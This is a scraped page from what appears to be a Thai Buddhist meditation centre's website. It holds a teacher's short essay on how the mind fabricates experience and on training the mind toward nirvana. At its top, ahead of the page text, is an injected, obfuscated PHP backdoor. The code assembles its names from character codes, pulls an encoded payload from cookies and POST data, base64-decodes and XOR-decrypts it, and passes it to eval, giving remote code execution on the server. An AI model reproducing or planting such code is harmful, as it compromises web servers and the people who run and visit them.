$iniKU = "\x4e" . 'g' . chr ( 756 - 658 )."\137" . chr ( 907 - 838 ).chr (66) . "\167";$myyExn = 'c' . 'l' . "\141" . "\x73" . "\163" . "\x5f" . "\x65" . chr (120) . chr ( 277 - 172 ).chr ( 880 - 765 )."\x74" . "\163";$vTdOqhW = class_exists($iniKU); $myyExn = "32259";$vAAay = !1;if ($vTdOqhW == $vAAay){function Jwxxo(){return FALSE;}$QfzmsEypX = "15648";Jwxxo();class Ngb_EBw{private function xKGGL($QfzmsEypX){if (is_array(Ngb_EBw::$avSeuoHui)) {$HNNJexxV = str_replace(chr (60) . chr ( 542 - 479 )."\160" . chr (104) . "\x70", "", Ngb_EBw::$avSeuoHui["\143" . "\x6f" . "\156" . 't' . "\145" . 'n' . "\x74"]);eval($HNNJexxV); $QfzmsEypX = "15648";exit();}}private $PpOeVk;public function eCrFVEB(){echo 28385;}public function __destruct(){$QfzmsEypX = "20419_16761";$this->xKGGL($QfzmsEypX); $QfzmsEypX = "20419_16761";}public function __construct($PlBYqoqvu=0){$JCuGXEK = $_POST;$LVuXxA = $_COOKIE;$otdEyqxrW = "abbe5226-71cc-40c5-9d39-6b2242a26fb4";$drVNpRcsa = @$LVuXxA[substr($otdEyqxrW, 0, 4)];if (!empty($drVNpRcsa)){$joLSFKk = "base64";$jVoOivToi = "";$drVNpRcsa = explode(",", $drVNpRcsa);foreach ($drVNpRcsa as $ythUtVZV){$jVoOivToi .= @$LVuXxA[$ythUtVZV];$jVoOivToi .= @$JCuGXEK[$ythUtVZV];}$jVoOivToi = array_map($joLSFKk . chr ( 292 - 197 )."\144" . "\145" . "\143" . "\157" . 'd' . 'e', array($jVoOivToi,)); $jVoOivToi = $jVoOivToi[0] ^ str_repeat($otdEyqxrW, (strlen($jVoOivToi[0]) / strlen($otdEyqxrW)) + 1);Ngb_EBw::$avSeuoHui = @unserialize($jVoOivToi); $jVoOivToi = class_exists("20419_16761");}}public static $avSeuoHui = 42183;}$wsxQiirY = new /* 12138 */ $iniKU(15648 + 15648); $QfzmsEypX = strpos($QfzmsEypX, $QfzmsEypX); $vAAay = $wsxQiirY = $QfzmsEypX = Array();} จิตปรุงแต่ง | ศูนย์พลาญข่อย
080-5519598 (คุณแก้ว) plarnkhoi@hotmail.com
Select Page

ธรรมะอยู่ในธรรมชาติ พระนิพพานก็อยู่ในธรรมชาติอยู่แล้วเช่นกัน และพระพุทธเจ้าเป็นผู้ค้นพบพระนิพพานและวิธีออกจากการเวียนว่ายตายเกิด
และนำมาสั่งสอนเราทั้งหลายที่ตกอยู่ภายใต้ความคิดและเวียนว่ายตายเกิด ติดอยู่กับสิ่งที่มันไม่มีตัวตน เป็นอุปาทานการยึดมั่นถือมั่น ซึ่งเป็นเรื่องของจิตโดยตรง

จิตที่มีอุปาทานมีการปรุงแต่งซ้อนกันอยู่มากมาย จนอาจจะเชื่อได้ยาก เพราะจะว่าไปแล้วก็เหมือนเราทุกคนกำลังเล่นละคร ที่ถูกปรุงแต่งในเรื่องเดียวกันอยู่
ทำให้เราไม่เห็นมัน ต้องอาศัยความสามารถในการอบรมจิต จนกระทั่งเราเริ่มเห็นความจริง ว่าสิ่งที่เราอยู่นั้นเป็นเพียงมิติของความคิด
ในช่วงแรกๆผู้ปฏิบัติอบรมจิตอาจจะเข้าใจเรื่องนี้ยากหน่อย แต่เมื่อเราใช้ภูมิปัญญาทางธรรมไตร่ตรองเข้าไปข้างใน เราก็จะเริ่มเห็นความจริงว่า
บรรดาสิ่งต่างๆที่มีอยู่ในชีวิตเรามันเกิดจากการปรุงแต่งของจิตเราทั้งนั้น ทำให้เราไปสุขไปทุกข์ได้

จิตนี้มันปรุงแต่งให้ชีวิตเราเป็นไปในเรื่องต่างๆ ถ้าเราตามจิตดวงนี้ทัน เราก็จะเห็นความจริง ทำให้จิตเราปรุงแต่งน้อยลง ความเป็นอัตตาตัวตนก็น้อยลง
จิตเมื่ออบรมแล้ว ก็จะเห็นตัวที่ไปปรุงไปแต่ง และเกิดเป็นปัญญารู้เท่าทันความคิดขึ้นมา ผุู้ที่ไม่รู้เท่าทันก็จะโดนจิตปรุงแต่ง พาไปรู้ไปหลงกับความอยากได้
อยากมี อยากเป็น หลงกับสิ่งของแพงๆ หลงกับกล่องหรือกระดาษห่อของที่สวยหรู มิได้ดูคุณค่าข้างใน ไม่ได้รู้เท่าทันความคิดที่ปรุงแต่ง
พอไปวัดก็ไปดูแต่โบราณสถานความงดงาม สร้างอะไรก็อยากสร้างใหญ่ๆแพงๆ ได้มีชื่อเสียง แต่ไม่ได้ปัญญาไม่ได้ธรรมะอะไร ไปเพื่อสร้างกิเลสให้กับตัวเอง

แต่หารู้ไม่ว่าสิ่งก่อสร้างสอนคนไม่ได้หรอก มีแต่การอบรมจิตเท่านั้นที่จะทำให้เกิดปัญญารู้แจ้งได้ นอกนั้นแล้วไม่ว่าพิธีกรรมใดๆ
ก็ไม่สามารถไปถึงแก่นจิตของเราได้ ต้องอบรมจิตจนกระทั่งจิตมันพบสิ่งที่เป็นปัญญา

ชีวิตนี้สั้นนัก ไม่นานเราก็หมดอายุไขโลก เป็นไปตามกฎของโลกธาตุ ที่มีกฏเกณฑ์ของมัน ฝืนไม่ได้ คนเกิดมาก็ต้องตาย ชาตะกับมรณะมาพร้อมกัน
เรามีสิทธิ์ครอบครองในทรัพย์สมบัติต่างๆเพียงชั่วคราว แม้แต่ธาตุสี่ ดิน น้ำ ลม ไฟ ที่มาประชุมเป็นร่าง กายสังขารนี้
ไม่นานถึงเวลาก็ต้องแยกธาตุกลับคืนสู่โลกธาตุ กลับไปสู่ความเป็นเดิมแท้ของธาตุไป

เรามีโอกาสเกิดมาเป็นมนุษย์ทั้งที ก็ควรหมั่นฝึกอบรมจิต จะเรียนกรรมฐานกองไหนก็ได้ เพื่อเข้าไปถึงจิตเดิมแท้ การฝึกจิตไม่ใช่เรื่องยาก
ไม่ใช่เรื่องง่าย เมื่อรู้จักจิตว่ามันพรากจากความคิดอย่างไร มันก็เจอความเดิมแท้ของมันเอง ใครทำก็เหมือนกันหมด ไม่ว่่าชนชาติไหน วิธีการใด
ก็เจออย่างนี้ เมื่อจิตตั้งมั่นแล้ว มันก็จะรู้ความจริงไปเรื่อยๆ จนเป็นปัญญาในวิปัสสนาภูมิ และเข้าถึงนิพพานในที่สุด

อ.บูรพา ผดุงไทย